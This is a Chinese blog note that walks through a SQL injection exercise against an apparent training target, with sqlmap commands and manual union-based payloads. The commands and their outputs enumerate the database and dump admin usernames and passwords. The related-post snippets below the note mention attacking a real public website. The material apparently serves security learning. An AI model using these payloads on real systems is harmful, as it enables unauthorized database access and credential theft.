kali Sqlmap实战演练(笔记)

最新推荐文章于 2023-07-08 19:21:07 发布
最新推荐文章于 2023-07-08 19:21:07 发布
阅读量381 收藏 3
点赞数
分类专栏: 笔记
coolwhisper
本文链接:https://blog.csdn.net/weixin_44947444/article/details/115833291
版权

1.检查注入点

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1

2.爆所有数据库信息

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1 --dbs

3.爆当前数据库信息

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1 --current-db

4.指定数据库名,列出所有表

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1 -D maoshe --tables   //maoshe:数据库名

5.指定库名表名列出所有字段

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1 -D maoshe -T admin --columns

6.指定库名表名列出指定字段

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1 -D maoshe -T admin -C username,password --dump

实战过程
1.手工检查是否存在注入点

http://59.63.200.79:8003/index.php/index.php?id=1  //页面回显正常

http://59.63.200.79:8003/index.php/index.php?id=1'   //页面回显不正常

http://59.63.200.79:8003/index.php/index.php?id=1 and 1=1 //页面回显正常

http://59.63.200.79:8003/index.php/index.php?id=1 and 1=2 //页面回显不正常

结论:存在int型注入漏洞

判断字段数

 ?id=1 and 1=1 order by 1
 ?id=1 and 1=1 order by 2
 ?id=1 and 1=1 order by 3

?id=1 order by 1
?id=1 order by 2
?id=1 order by 3

<<  3回显错误,字段数为2

判断回显点

?id=1 and 1=2 union select 1,2

正式注入

?id=1 and 1=2 union select 1,version()   

>> 5.5.53

?id=1 and 1=2 union select 1,database()

>>  maoshe

数据库

?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

>>  admin

查字段

?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 0,1

<<  Id

?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1

<< username 

?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1

<<  password

?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 3,1

<<  无,查出 admin 表里 有 id username password 三个字段

查字段内容

?id=1 and 1=2 union select 1,username from admin  limit 0,1

<<  admin

?id=1 and 1=2 union select 1,username from admin  limit 1,1

<<  ppt领取微信

?id=1 and 1=2 union select 1,password from admin  limit 0,1

<<  hellohack     //flag

?id=1 and 1=2 union select 1,password from admin  limit 1,1

<<  zkaqbanban

直观一点做法

?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

<<  admin,dirs,news,xss

?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

<<  Id,username,password

?id=1 and 1=2 union select 1,group_concat(id,username,password) from admin

<<  1adminhellohack,2ppt领取微信zkaqbanban

?id=1 and 1=2 union select 1,group_concat(id,0x40,username,0x3a,password) from admin

<<  1@admin:hellohack,2@ppt领取微信:zkaqbanban

到这里其实已经可以结束了

?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='dirs'

<<  paths

?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='news'

<<  id,content

?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='xss'

<<  id,user,pass

2.使用sqlmap判断是否存在注入漏洞

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1


3.获取所有数据库信息

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1 --dbs

在这里插入图片描述
获取当前数据库名

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1 --current-db


4.获取当前数据库信息

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1 -D maoshe --tables


5.指定库名表名列出所有字段

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1 -D maoshe -T admin --columns


6.指定库名表名列出指定字段

python3 sqlmap.py -u http://59.63.200.79:8003/index.php/index.php?id=1 -D maoshe -T admin -C username,password --dump


用户名:admin
密码:hellohack

吃饺子不蘸酱油
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL数据库查询,select
AriesLY0411的博客
11-26 1414
概述 数据的操作永远离不开增删改查四个字,也就是DML数据操作语言:涉及增删改,DQL语言:数据查询语言 关键字select DQL语言:数据查询语言 D:Data Q:Quevy L:Language 关键字:select 查询:select select 字段名1,字段名2,字段名3... from 表名 也可以用表名.字段名 用于区分不同的表拥有相同的表名 取别名: 关键字 AS select * from 表名 as 表别名; --as可以省略,但最好加...
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
最新发布
2301_82242964的博客
05-04 546
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
java检索账号和密码_javaWEB小练习:在数据库中查找相同的usernamepassword
weixin_31507527的博客
02-27 454
/*练习题:* 在Mysql数据库中创建一个person数据表,添加三个字段,id,user,password,并录入几条记录**练习题:定义一个login.html,里面定义了两个请求字段:user,password,发送请求到loginServlet。*再创建一个,LoginServlet(需要继承自HttpServlet,并重写doPost方法)*在其中获取请求的user,password*...
kalisqlmap应用实战
m0_37422153的博客
03-31 6345
前言 好久没有玩kali,都说kali玩的好,局子进的早,今天打算用sqlmap来获取某个悲催网站的管理员账号和密码,www.bible-history.com这个就是传说中经常被攻击的网站,今天就拿它开刀。 实践 sqlmap工具通常都是用sql自动注入来获取网站管理员密码。点击https://www.bible-history.com/subcat.php这个网址跳转的网站界面如下: 点击ht...
sqlmapkali中的应用及ctfhub实战
2301_77004573的博客
07-08 1158
工具一把嗦固然方便,但仍不能忽视对原理的理解,毕竟常有sqlmap跑不出来的题目,为了检验自己对sql注入的掌握情况,之后也会补一篇手工注入的文章。
转载:sqlmap的应用实战
sinolzeng的专栏
02-13 357
原文链接:https://blog.csdn.net/vala0901/article/details/71548954 有幸在kali中文网上查看了很多大神写的sqlmap的教程,其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结,给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤,啊,不,是拖库。。。。。 1.首先要知道可以注入的网址是什么 http://www.bible-history.com/subcat.php?id=..
kalisqlmaps的简单使用
weixin_43534549的博客
04-08 3344
1.首先在控制台输入sqlmap-h查看相关参数 2.找到一个可利用的网址,判断网站数据库类型,命令格式为:salmap-u 3。回车确定查看目标数据库信息,已查处目标数据库为mysql5.0.12 4.确定数据库类型为mysql后,查看存在的数据库,命令格式为:sqlmap-u目标网址–dbs回车 5.查看数据库中存在的表,命令格式为:sqlmap-u目标网址–tables-D数据库名,...
sqlmap的学习笔记
搬砖厂长
06-20 5145
sqlmap 一般性使用过程: 转载:http://drops.wooyun.org/tips/2113 0x01 定位注入的网站 这通常是最枯燥和最耗时的一步,如果你已经知道如何使用Google Dorks(Google dorks sql insection:谷歌傻瓜式SQL注入)或许会有些头绪,但是假如你还没有整理过用于Google搜索的那些字符串的话,可以考虑复制下面
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 7785
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
kali实战渗透
12-14
写的是kali实战渗透,其中有讲msf渗透,kali基础命令使用等等等,非常多
KALI linux学习记录笔记
05-13
KALI linux学习记录笔记 linux入门的笔记,包括常用命令!
kali-linux笔记
01-10
个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践...
B站kali前5章笔记.zip
03-14
B站kali前5章笔记
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
net user命令用法
那年烟花终亦冷
08-17 3567
net user #查看用户 net user ? #帮助 net user 用户名 密码 /add #新建用户 net user 用户名 新密码 #修改密码 net user 用户名 /delete #删除账户 net localgroup administrators #查看是否是管理员 ...
centos安装nc
那年烟花终亦冷
12-18 3141
yum install -y nc
Cobalt Strike(学习笔记)
那年烟花终亦冷
06-07 2744
Cobalt Strike简介 Cobalt Strike 是一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等。 Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。 注:鉴于作为新人面试会用到这些基础知识,所以把简介也抄过来了。 安装Cobal
查看操作系统架构
那年烟花终亦冷
02-11 1852
在做frp内网穿透需要查看操作系统架构。 查看linux操作系统: uname -m windows系统: systeminfo
kalisqlmap
07-28
kalisqlmap是一个命令行工具,用于检测和利用SQL注入漏洞。它可以在Windows和Linux系统上使用,并且具有相同的语法参数。你可以使用"sqlmap --version"命令来查看kalisqlmap的版本信息,使用"sqlmap -h"命令来查看...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值